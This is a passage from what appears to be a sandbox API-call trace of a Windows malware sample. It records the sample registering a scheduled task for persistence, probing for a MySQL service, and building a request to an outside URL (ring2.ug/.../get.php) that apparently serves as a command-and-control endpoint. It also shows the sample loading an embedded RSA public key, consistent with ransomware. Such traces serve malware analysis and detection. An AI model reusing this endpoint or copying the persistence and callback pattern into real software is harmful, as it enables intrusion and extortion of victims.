Size=0xc) returned 0x32e2fb8 [0073.343] IExecAction:put_Path (This=0x2a20c98, Path="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996\\243E.TMP.EXE.DEL105265203.DEL105731312.exe") returned 0x0 [0073.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32e2fb8 | out: hHeap=0x630000) returned 1 [0073.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x32e2fb8 [0073.343] IExecAction:put_Arguments (This=0x2a20c98, Arguments="--Task") returned 0x0 [0073.343] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32e2fb8 | out: hHeap=0x630000) returned 1 [0073.343] IUnknown:Release (This=0x2a20c98) returned 0x1 [0073.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x32e2fb8 [0073.344] ITaskFolder:RegisterTaskDefinition (in: This=0x2a20920, Path="Time Trigger Task", pDefinition=0x2a20950, flags=6, UserId=0x18d930*(varType=0x0, wReserved1=0x32c, wReserved2=0xde44, wReserved3=0x18, varVal1=0x420cab, varVal2=0x630000), password=0x18d940*(varType=0x0, wReserved1=0x0, wReserved2=0x100, wReserved3=0x0, varVal1=0x7f, varVal2=0x7), LogonType=3, sddl=0x18d954*(varType=0x8, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1="", varVal2=0x108), ppTask=0x18de5c | out: ppTask=0x18de5c*=0x2a20d18) returned 0x0 [0073.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32e2fb8 | out: hHeap=0x630000) returned 1 [0073.422] TaskScheduler:IUnknown:Release (This=0x2a20920) returned 0x0 [0073.422] TaskScheduler:IUnknown:Release (This=0x2a20950) returned 0x0 [0073.422] IUnknown:Release (This=0x2a20d18) returned 0x0 [0073.422] CoUninitialize () [0073.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b75c0 | out: hHeap=0x630000) returned 1 [0073.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0073.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x66d528 | out: hHeap=0x630000) returned 1 [0073.425] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x685e88 [0073.427] OpenServiceW (hSCManager=0x685e88, lpServiceName="MYSQL", dwDesiredAccess=0x20) returned 0x0 [0073.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5e08 [0073.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32c7958 [0073.427] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32c72b8 [0073.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32c7df8 [0073.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32c8060 [0073.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32c82c8 [0073.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32c8530 [0073.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32ed6f8 [0073.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32ed960 [0073.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32edbc8 [0073.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32ede30 [0073.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32ee098 [0073.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32ee300 [0073.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32ee568 [0073.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32ee7d0 [0073.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32eea38 [0073.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32eeca0 [0073.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x687df0 [0073.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x110) returned 0x32b75c0 [0073.428] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x687df0 | out: hHeap=0x630000) returned 1 [0073.428] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x110) returned 0x32c7520 [0073.428] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41dbd0, lpParameter=0x32d8c40, dwCreationFlags=0x0, lpThreadId=0x513258 | out: lpThreadId=0x513258*=0x36c) returned 0x5b0 [0073.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b75c0 | out: hHeap=0x630000) returned 1 [0073.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x28) returned 0x3315ff8 [0073.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32eef08 [0073.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32ef170 [0073.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32ef3d8 [0073.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32ef640 [0073.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32ef8a8 [0073.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32efb10 [0073.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32efd78 [0073.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32effe0 [0073.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32f0248 [0073.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32f04b0 [0073.733] lstrlenA (lpString="http://ring2.ug/Asjdi435784ihjk65pen2/get.php") returned 45 [0073.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x5c) returned 0x70f518 [0073.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32eef08, cbMultiByte=-1, lpWideCharStr=0x70f518, cchWideChar=46 | out: lpWideCharStr="http://ring2.ug/Asjdi435784ihjk65pen2/get.php") returned 46 [0073.733] lstrcatW (in: lpString1="", lpString2="http://ring2.ug/Asjdi435784ihjk65pen2/get.php" | out: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php") returned="http://ring2.ug/Asjdi435784ihjk65pen2/get.php" [0073.733] lstrlenA (lpString="") returned 0 [0073.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2) returned 0x726300 [0073.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32ef170, cbMultiByte=-1, lpWideCharStr=0x726300, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0073.733] lstrcatW (in: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php", lpString2="" | out: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php") returned="http://ring2.ug/Asjdi435784ihjk65pen2/get.php" [0073.733] lstrlenA (lpString="") returned 0 [0073.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2) returned 0x7262d0 [0073.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32ef3d8, cbMultiByte=-1, lpWideCharStr=0x7262d0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0073.733] lstrcatW (in: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php", lpString2="" | out: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php") returned="http://ring2.ug/Asjdi435784ihjk65pen2/get.php" [0073.733] lstrlenA (lpString="") returned 0 [0073.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2) returned 0x726370 [0073.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32ef640, cbMultiByte=-1, lpWideCharStr=0x726370, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0073.733] lstrcatW (in: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php", lpString2="" | out: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php") returned="http://ring2.ug/Asjdi435784ihjk65pen2/get.php" [0073.734] lstrlenA (lpString="") returned 0 [0073.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2) returned 0x726320 [0073.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32ef8a8, cbMultiByte=-1, lpWideCharStr=0x726320, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0073.734] lstrcatW (in: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php", lpString2="" | out: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php") returned="http://ring2.ug/Asjdi435784ihjk65pen2/get.php" [0073.734] lstrlenA (lpString="") returned 0 [0073.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2) returned 0x726330 [0073.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32efb10, cbMultiByte=-1, lpWideCharStr=0x726330, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0073.734] lstrcatW (in: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php", lpString2="" | out: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php") returned="http://ring2.ug/Asjdi435784ihjk65pen2/get.php" [0073.734] lstrlenA (lpString="") returned 0 [0073.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2) returned 0x726390 [0073.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32efd78, cbMultiByte=-1, lpWideCharStr=0x726390, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0073.734] lstrcatW (in: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php", lpString2="" | out: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php") returned="http://ring2.ug/Asjdi435784ihjk65pen2/get.php" [0073.734] lstrlenA (lpString="") returned 0 [0073.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2) returned 0x726340 [0073.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32effe0, cbMultiByte=-1, lpWideCharStr=0x726340, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0073.734] lstrcatW (in: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php", lpString2="" | out: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php") returned="http://ring2.ug/Asjdi435784ihjk65pen2/get.php" [0073.734] lstrlenA (lpString="") returned 0 [0073.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2) returned 0x726350 [0073.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32f0248, cbMultiByte=-1, lpWideCharStr=0x726350, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0073.734] lstrcatW (in: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php", lpString2="" | out: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php") returned="http://ring2.ug/Asjdi435784ihjk65pen2/get.php" [0073.734] lstrlenA (lpString="") returned 0 [0073.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2) returned 0x726360 [0073.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32f04b0, cbMultiByte=-1, lpWideCharStr=0x726360, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0073.735] lstrcatW (in: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php", lpString2="" | out: lpString1="http://ring2.ug/Asjdi435784ihjk65pen2/get.php") returned="http://ring2.ug/Asjdi435784ihjk65pen2/get.php" [0073.735] lstrlenW (lpString="") returned 0 [0073.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x12) returned 0x6563b8 [0073.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x288) returned 0x32c8798 [0073.735] GetAdaptersInfo (in: AdapterInfo=0x32c8798, SizePointer=0x18de74 | out: AdapterInfo=0x32c8798, SizePointer=0x18de74) returned 0x0 [0073.837] GetAdaptersInfo (in: AdapterInfo=0x32c8798, SizePointer=0x18de74 | out: AdapterInfo=0x32c8798, SizePointer=0x18de74) returned 0x0 [0073.852] GetLastError () returned 0x0 [0073.859] GetLastError () returned 0x0 [0073.860] CryptAcquireContextW (in: phProv=0x18de44, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18de44*=0x692d18) returned 1 [0073.910] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18de4c | out: phHash=0x18de4c) returned 1 [0073.910] CryptHashData (hHash=0x330c4a8, pbData=0x32d79d0, dwDataLen=0x11, dwFlags=0x0) returned 1 [0073.910] CryptGetHashParam (in: hHash=0x330c4a8, dwParam=0x2, pbData=0x0, pdwDataLen=0x18de48, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18de48) returned 1 [0073.910] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32ad4a0 [0073.910] CryptGetHashParam (in: hHash=0x330c4a8, dwParam=0x2, pbData=0x32ad4a0, pdwDataLen=0x18de48, dwFlags=0x0 | out: pbData=0x32ad4a0, pdwDataLen=0x18de48) returned 1 [0073.910] GetLastError () returned 0x0 [0073.910] CryptDestroyHash (hHash=0x330c4a8) returned 1 [0073.910] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0073.910] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d79d0 | out: hHeap=0x630000) returned 1 [0073.910] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173d8 [0073.910] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316e98 | out: hHeap=0x630000) returned 1 [0073.910] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x685f28 | out: hHeap=0x630000) returned 1 [0073.910] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41e690, lpParameter=0x513270, dwCreationFlags=0x0, lpThreadId=0x51325c | out: lpThreadId=0x51325c*=0x578) returned 0x5d4 [0074.199] WaitForSingleObject (hHandle=0x5d4, dwMilliseconds=0xffffffff) returned 0x0 [0076.585] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}") returned 0x5d0 [0076.591] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x28) returned 0x33161a8 [0076.591] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32f0be8 [0076.591] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32f10b8 [0076.591] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32f1320 [0076.591] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3351fd8 [0076.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3352240 [0076.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x33524a8 [0076.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3352710 [0076.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3352978 [0076.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3352be0 [0076.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x3352e48 [0076.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x3e0) returned 0x32cbb80 [0076.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x5ec) returned 0x32d29c0 [0076.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x32d29c0, cbMultiByte=1516, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 493 [0076.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x5f0) returned 0x32ca798 [0076.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d29c0 | out: hHeap=0x630000) returned 1 [0076.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cbb80 | out: hHeap=0x630000) returned 1 [0076.644] CryptAcquireContextW (in: phProv=0x18deb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18deb4*=0x6930d0) returned 1 [0076.646] CryptCreateHash (in: hProv=0x6930d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18deb8 | out: phHash=0x18deb8) returned 1 [0076.646] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0076.646] CryptHashData (hHash=0x330c428, pbData=0x32ca798, dwDataLen=0x1ec, dwFlags=0x0) returned 1 [0076.646] CryptGetHashParam (in: hHash=0x330c428, dwParam=0x2, pbData=0x0, pdwDataLen=0x18debc, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18debc) returned 1 [0076.646] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32aed00 [0076.646] CryptGetHashParam (in: hHash=0x330c428, dwParam=0x2, pbData=0x32aed00, pdwDataLen=0x18debc, dwFlags=0x0 | out: pbData=0x32aed00, pdwDataLen=0x18debc) returned 1 [0076.646] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x34) returned 0x330c4a8 [0076.654] GetLastError () returned 0x0 [0076.672] lstrcatA (in: lpString1="", lpString2="6F" | out: lpString1="6F") returned="6F" [0076.672] GetLastError () returned 0x0 [0076.672] lstrcatA (in: lpString1="6F", lpString2="3C" | out: lpString1="6F3C") returned="6F3C" [0076.672] GetLastError () returned 0x0 [0076.672] lstrcatA (in: lpString1="6F3C", lpString2="75" | out: lpString1="6F3C75") returned="6F3C75" [0076.672] GetLastError () returned 0x0 [0076.672] lstrcatA (in: lpString1="6F3C75", lpString2="51" | out: lpString1="6F3C7551") returned="6F3C7551" [0076.672] GetLastError () returned 0x0 [0076.672] lstrcatA (in: lpString1="6F3C7551", lpString2="E2" | out: lpString1="6F3C7551E2") returned="6F3C7551E2" [0076.672] GetLastError () returned 0x0 [0076.672] lstrcatA (in: lpString1="6F3C7551E2", lpString2="67" | out: lpString1="6F3C7551E267") returned="6F3C7551E267" [0076.672] GetLastError () returned 0x0 [0076.672] lstrcatA (in: lpString1="6F3C7551E267", lpString2="D6" | out: lpString1="6F3C7551E267D6") returned="6F3C7551E267D6" [0076.673] GetLastError () returned 0x0 [0076.673] lstrcatA (in: lpString1="6F3C7551E267D6", lpString2="BC" | out: lpString1="6F3C7551E267D6BC") returned="6F3C7551E267D6BC" [0076.673] GetLastError () returned 0x0 [0076.673] lstrcatA (in: lpString1="6F3C7551E267D6BC", lpString2="75" | out: lpString1="6F3C7551E267D6BC75") returned="6F3C7551E267D6BC75" [0076.673] GetLastError () returned 0x0 [0076.673] lstrcatA (in: lpString1="6F3C7551E267D6BC75", lpString2="62" | out: lpString1="6F3C7551E267D6BC7562") returned="6F3C7551E267D6BC7562" [0076.673] GetLastError () returned 0x0 [0076.673] lstrcatA (in: lpString1="6F3C7551E267D6BC7562", lpString2="F4" | out: lpString1="6F3C7551E267D6BC7562F4") returned="6F3C7551E267D6BC7562F4" [0076.673] GetLastError () returned 0x0 [0076.673] lstrcatA (in: lpString1="6F3C7551E267D6BC7562F4", lpString2="98" | out: lpString1="6F3C7551E267D6BC7562F498") returned="6F3C7551E267D6BC7562F498" [0076.673] GetLastError () returned 0x0 [0076.673] lstrcatA (in: lpString1="6F3C7551E267D6BC7562F498", lpString2="26" | out: lpString1="6F3C7551E267D6BC7562F49826") returned="6F3C7551E267D6BC7562F49826" [0076.673] GetLastError () returned 0x0 [0076.674] lstrcatA (in: lpString1="6F3C7551E267D6BC7562F49826", lpString2="A4" | out: lpString1="6F3C7551E267D6BC7562F49826A4") returned="6F3C7551E267D6BC7562F49826A4" [0076.674] GetLastError () returned 0x0 [0076.674] lstrcatA (in: lpString1="6F3C7551E267D6BC7562F49826A4", lpString2="CE" | out: lpString1="6F3C7551E267D6BC7562F49826A4CE") returned="6F3C7551E267D6BC7562F49826A4CE" [0076.674] GetLastError () returned 0x0 [0076.674] lstrcatA (in: lpString1="6F3C7551E267D6BC7562F49826A4CE", lpString2="82" | out: lpString1="6F3C7551E267D6BC7562F49826A4CE82") returned="6F3C7551E267D6BC7562F49826A4CE82" [0076.674] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0076.674] CryptDestroyHash (hHash=0x330c428) returned 1 [0076.674] CryptReleaseContext (hProv=0x6930d0, dwFlags=0x0) returned 1 [0076.674] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ca798 | out: hHeap=0x630000) returned 1 [0076.674] lstrlenA (lpString="6F3C7551E267D6BC7562F49826A4CE82") returned 32 [0076.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x3e0) returned 0x32cbb80 [0076.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x5ec) returned 0x32d29c0 [0076.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x32d29c0, cbMultiByte=1516, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 493 [0076.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x5f0) returned 0x32ca798 [0076.674] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d29c0 | out: hHeap=0x630000) returned 1 [0076.674] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cbb80 | out: hHeap=0x630000) returned 1 [0076.675] lstrcpyA (in: lpString1=0x32d8c60, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned="-----BEGIN PUBLIC 